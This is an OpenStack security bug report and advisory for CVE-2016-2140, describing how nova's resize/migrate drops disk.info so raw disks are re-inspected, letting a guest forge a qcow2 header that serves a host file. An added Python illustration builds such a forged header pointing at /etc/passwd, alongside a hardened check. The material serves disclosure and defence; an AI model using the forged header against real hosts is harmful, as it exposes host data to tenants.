[OSSA 2016-007] Host data leak during resize/migrate for raw-backed instances (CVE-2016-2140)
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
OpenStack Compute (nova) | Fix Released | Critical | Lee Yarwood |
Kilo | Fix Released | Critical | Lee Yarwood |
Liberty | Fix Released | Critical | Lee Yarwood |
OpenStack Security Advisory | Fix Released | Critical | Unassigned |
Bug Description
First, a caveat. This report is from code inspection only. I haven't attempted to replicate it, and I have no immediate plans to. It's possible it doesn't exist due to an interaction which isn't immediately obvious.
When resizing an instance using the libvirt driver, we run LibvirtDriver.
```python
for info in disk_info:
    # assume inst_base == dirname(
    ...
```
Note that this doesn't copy disk.info, because it's not a disk. I have actually confirmed this whilst investigating another bug.
The problem with this is that disk.info contains file format information, which means that when the instance starts up again, the format of all its disks is re-inspected. This is the bug. It means that a malicious user can write data to an ephemeral or root disk which fakes a qcow2 header, and on re-inspection it will be detected as qcow2 and data from a user-specified backing file will be served.
I am moderately confident that this is a real bug.
Unlike the previous file format bug I reported, though, this bug would be mitigated by the fact that the user would have to access the disk via libvirt/qemu. Assuming they haven't disabled SELinux (nobody does that, right?) this severely limits the data which can be accessed, possibly to the point that it isn't worth exploiting. I also believe it would only be exploitable on deployments using raw storage, which I believe isn't common.
Given that I don't think it's all that serious in practice, I'm not going to work on this immediately as I don't have the time. If it's still around when I'm less busy I'll pick it up.
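The mechanism the report describes, as an added illustration rather than code from nova or from the reporter: a guest writes a forged qcow2 header (with a backing-file pointer naming a host path) into the first sector of its own raw disk, and whether that pointer is ever honoured depends on whether the host still has a recorded format for the disk. The instance path, the disk.info content (modelled as a JSON map of disk path to format), the `/etc/passwd` target and the "hardened" resolver are all assumptions made for the example; the hardened variant is not nova's actual patch, only a defensive shape that refuses to content-sniff a disk whose recorded format is missing or contradicted.

```python
import json
import struct
from typing import Optional, Tuple

QCOW2_MAGIC = b"QFI\xfb"
QCOW2_V2_HEADER_LEN = 72

# Hypothetical instance directory and disk path (nova derives the real ones
# from instances_path and the instance UUID).
INSTANCE_DIR = "/var/lib/nova/instances/11111111-2222-3333-4444-555555555555"
DISK_PATH = INSTANCE_DIR + "/disk"

# Constructed stand-in for disk.info: a JSON map of disk path -> format. Its
# presence is what pins the format so the image bytes are never sniffed.
DISK_INFO = json.dumps({DISK_PATH: "raw"})


def forge_qcow2_header(backing_file: str, virtual_size: int = 1 << 30) -> bytes:
    """Build a minimal qcow2 v2 header whose backing-file pointer names an
    arbitrary host path. This is what a guest can write to sector 0 of its
    own raw root or ephemeral disk."""
    backing = backing_file.encode()
    header = struct.pack(
        ">4sIQIIQIIQQIIQ",
        QCOW2_MAGIC,          # magic
        2,                    # version
        QCOW2_V2_HEADER_LEN,  # backing_file_offset: immediately after header
        len(backing),         # backing_file_size
        16,                   # cluster_bits (64 KiB clusters)
        virtual_size,         # virtual size
        0, 0, 0, 0, 0, 0, 0,  # crypt_method, l1_size, l1_table_offset,
                              # refcount_table_offset, refcount_table_clusters,
                              # nb_snapshots, snapshots_offset
    )
    return header + backing


def probe_format(image: bytes) -> Tuple[str, Optional[str]]:
    """Content sniffing, the way 'qemu-img info' behaves when no format is
    given: whatever the bytes claim to be is believed, backing file included."""
    if len(image) >= QCOW2_V2_HEADER_LEN and image[:4] == QCOW2_MAGIC:
        version, bf_off, bf_len = struct.unpack(">IQI", image[4:20])
        if version in (2, 3) and bf_len and bf_off + bf_len <= len(image):
            return "qcow2", image[bf_off:bf_off + bf_len].decode(errors="replace")
        return "qcow2", None
    return "raw", None


def recorded_format(disk_info_json: Optional[str], path: str) -> Optional[str]:
    """Look the disk up in disk.info; None when the file was not carried over."""
    if disk_info_json is None:
        return None
    return json.loads(disk_info_json).get(path)


def resolve_format_pre_fix(image: bytes, path: str,
                           disk_info_json: Optional[str]) -> Tuple[str, Optional[str]]:
    """Models the vulnerable flow: a recorded format is trusted as-is, but when
    disk.info is missing (it was not copied on resize/migrate) the disk is
    re-inspected and the forged header wins."""
    fmt = recorded_format(disk_info_json, path)
    if fmt is not None:
        return fmt, None          # pinned format; backing pointer never read
    return probe_format(image)    # sniffing: attacker-controlled answer


def resolve_format_hardened(image: bytes, path: str,
                            disk_info_json: Optional[str]) -> Tuple[str, Optional[str]]:
    """Illustrative defensive variant (not nova's patch): never let sniffing
    upgrade a disk to qcow2, and treat a raw disk that now carries a qcow2
    header as tampered rather than booting it."""
    fmt = recorded_format(disk_info_json, path)
    if fmt is None:
        raise ValueError("no recorded format for %s; refusing to sniff" % path)
    sniffed, backing = probe_format(image)
    if fmt == "raw" and sniffed == "qcow2":
        raise ValueError("raw disk %s carries a qcow2 header (backing=%r)"
                         % (path, backing))
    return fmt, None


if __name__ == "__main__":
    forged = forge_qcow2_header("/etc/passwd")        # constructed payload
    forged += b"\x00" * (4096 - len(forged))          # pad to a sector multiple
    print("sniffed:", probe_format(forged))
    print("with disk.info:", resolve_format_pre_fix(forged, DISK_PATH, DISK_INFO))
    print("disk.info lost:", resolve_format_pre_fix(forged, DISK_PATH, None))
```

Running it shows the same bytes resolving to `raw` while disk.info is present and to `qcow2` with backing file `/etc/passwd` once it is gone; that second answer is what qemu would act on, and what the hardened resolver rejects.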
CVE References
CVE-2016-2140

- description: updated
- Changed in ossa: status: New → Incomplete
- summary: Host data leak during resize/migrate for raw-backed instances (CVE-2016-2140)
- Changed in ossa: status: Confirmed → In Progress
- Changed in ossa: status: In Progress → Fix Committed
- information type: Private Security → Public
- summary: Host data leak during resize/migrate for raw-backed instances (CVE-2016-2140) → [OSSA 2016-007] Host data leak during resize/migrate for raw-backed instances (CVE-2016-2140)
- description: updated
- Changed in nova: importance: Undecided → Critical
- Changed in ossa: status: Fix Committed → Fix Released
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.
So IIRC, the user needs direct access to libvirt/qemu to overwrite the disk with fake qcow2 headers after the instance is migrated and before the disk is re-inspected?